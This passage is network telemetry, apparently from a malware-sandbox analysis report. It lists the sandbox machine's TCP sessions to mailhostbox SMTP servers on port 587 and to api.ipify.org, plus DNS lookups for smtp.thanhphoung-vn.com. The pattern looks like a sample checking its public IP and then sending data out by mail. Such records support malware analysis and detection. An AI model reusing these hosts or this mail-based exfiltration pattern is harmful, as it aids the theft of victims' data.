                                                                                                                                            Mar 20, 2023 11:34:27.027049065 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.027729988 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:27.325263977 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.325484037 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:27.510116100 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.510591030 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.510909081 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:27.698324919 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.698901892 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:27.889137983 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:27.889378071 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.078640938 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.078994036 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.289134026 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.289359093 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.475245953 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.478169918 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.478286982 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.478393078 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.480474949 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.481839895 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.484353065 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.488352060 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.488766909 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:28.662743092 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.665241957 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.666315079 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.672934055 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.712579966 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.828916073 CET58749699208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:28.879077911 CET49699587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:34:30.297919035 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:30.297946930 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:30.298019886 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:30.320446014 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:30.320467949 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.008763075 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.008974075 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:31.086452007 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:31.086497068 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.086904049 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.145052910 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:31.581836939 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:31.581891060 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.749855995 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.749946117 CET44349700104.237.62.211192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:31.750000954 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:31.751223087 CET49700443192.168.2.3104.237.62.211
                                                                                                                                            Mar 20, 2023 11:34:49.059318066 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:49.059384108 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.059488058 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:49.076458931 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:49.076491117 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.722548962 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.722654104 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:49.724966049 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:49.724988937 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.725353003 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.880920887 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:50.166464090 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:50.166501045 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:50.323780060 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:50.324071884 CET44349701173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:50.324163914 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:50.326894999 CET49701443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:35:08.123877048 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:11.148341894 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:11.331279993 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.334269047 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:11.579893112 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:11.590221882 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.592853069 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:11.766566992 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.766650915 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:11.775758028 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.776196957 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.776474953 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:11.959743023 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.959975958 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:11.962838888 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.963169098 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.144820929 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.145034075 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.145421028 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:12.151539087 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.151762009 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.333383083 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.333642006 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:12.336483002 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.336699009 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.524157047 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.524444103 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:12.550317049 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.550538063 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.711761951 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.712461948 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:12.734956026 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.738168001 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.738289118 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.738570929 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.738570929 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:12.921103954 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.921178102 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.924285889 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:12.925528049 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.058434963 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.112901926 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.113998890 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.114104033 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.114159107 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.114183903 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.148502111 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.154227018 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.298612118 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.299078941 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.337726116 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.337757111 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.337857008 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.337970972 CET49702587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.391014099 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.430918932 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.490976095 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.520589113 CET58749702208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.575429916 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.575668097 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.676893950 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.676918983 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.677033901 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.677090883 CET49703587192.168.2.3208.91.199.225
                                                                                                                                            Mar 20, 2023 11:35:13.761910915 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.762095928 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:13.862418890 CET58749703208.91.199.225192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.892395973 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:13.944586992 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.944767952 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.945008039 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.077153921 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.077281952 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:14.130177021 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.130428076 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.270006895 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.311436892 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:14.318630934 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.318866014 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.496320009 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.496598005 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.496830940 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:14.502434969 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.502640009 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.684770107 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.685031891 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:14.713077068 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.713208914 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.876605034 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.876791954 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:14.896744013 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:14.897181988 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897278070 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897310972 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897355080 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897490025 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897536993 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897563934 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:14.897586107 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:15.063580990 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.063796043 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.079673052 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.080153942 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.080250025 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.202651978 CET58749704208.91.198.143192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.275104046 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.398716927 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.398794889 CET49704587192.168.2.3208.91.198.143
                                                                                                                                            Mar 20, 2023 11:35:15.644530058 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.831379890 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:15.831841946 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.831913948 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.831913948 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.831940889 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.832066059 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.832109928 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.832109928 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:15.832109928 CET49705587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:35:16.016962051 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:16.017004013 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:16.017153025 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:16.150226116 CET58749705208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:16.383181095 CET49705587192.168.2.3208.91.199.223

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Mar 20, 2023 11:34:04.587151051 CET6270453192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:04.604804993 CET53627048.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:04.630570889 CET4997753192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:04.648533106 CET53499778.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:21.423542976 CET5784053192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET53578408.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:21.668317080 CET5799053192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET53579908.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:26.378746986 CET5238753192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET53523878.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:26.650958061 CET5692453192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET53569248.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:30.184617996 CET6062553192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:30.205163956 CET53606258.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:30.247442961 CET4930253192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:30.265024900 CET53493028.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:48.972012997 CET5397553192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:48.991746902 CET53539758.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:49.006277084 CET5113953192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:34:49.025790930 CET53511398.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:07.848213911 CET5295553192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET53529558.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:07.923472881 CET6058253192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET53605828.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.521610022 CET5713453192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET53571348.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:11.550168991 CET6205053192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET53620508.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.346518040 CET5604253192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET53560428.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.370173931 CET5963653192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET53596368.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.686616898 CET5563853192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET53556388.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:13.707135916 CET5770453192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET53577048.8.8.8192.168.2.3
                                                                                                                                            Mar 20, 2023 11:35:18.445074081 CET6532053192.168.2.38.8.8.8
                                                                                                                                            Mar 20, 2023 11:35:18.463351011 CET53653208.8.8.8192.168.2.3

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Mar 20, 2023 11:34:04.587151051 CET192.168.2.38.8.8.80x7ae6Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.630570889 CET192.168.2.38.8.8.80x695Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.423542976 CET192.168.2.38.8.8.80xe8f9Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.668317080 CET192.168.2.38.8.8.80x9677Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.378746986 CET192.168.2.38.8.8.80x17f9Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.650958061 CET192.168.2.38.8.8.80x706fStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.184617996 CET192.168.2.38.8.8.80x77bdStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.247442961 CET192.168.2.38.8.8.80x687fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:48.972012997 CET192.168.2.38.8.8.80x1893Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:49.006277084 CET192.168.2.38.8.8.80x92beStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.848213911 CET192.168.2.38.8.8.80xef2dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.923472881 CET192.168.2.38.8.8.80xe3adStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.521610022 CET192.168.2.38.8.8.80xef58Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.550168991 CET192.168.2.38.8.8.80xa756Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.346518040 CET192.168.2.38.8.8.80xcf7dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.370173931 CET192.168.2.38.8.8.80x950cStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.686616898 CET192.168.2.38.8.8.80x2a52Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.707135916 CET192.168.2.38.8.8.80xa55dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:18.445074081 CET192.168.2.38.8.8.80x10dcStandard query (0)203.215.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
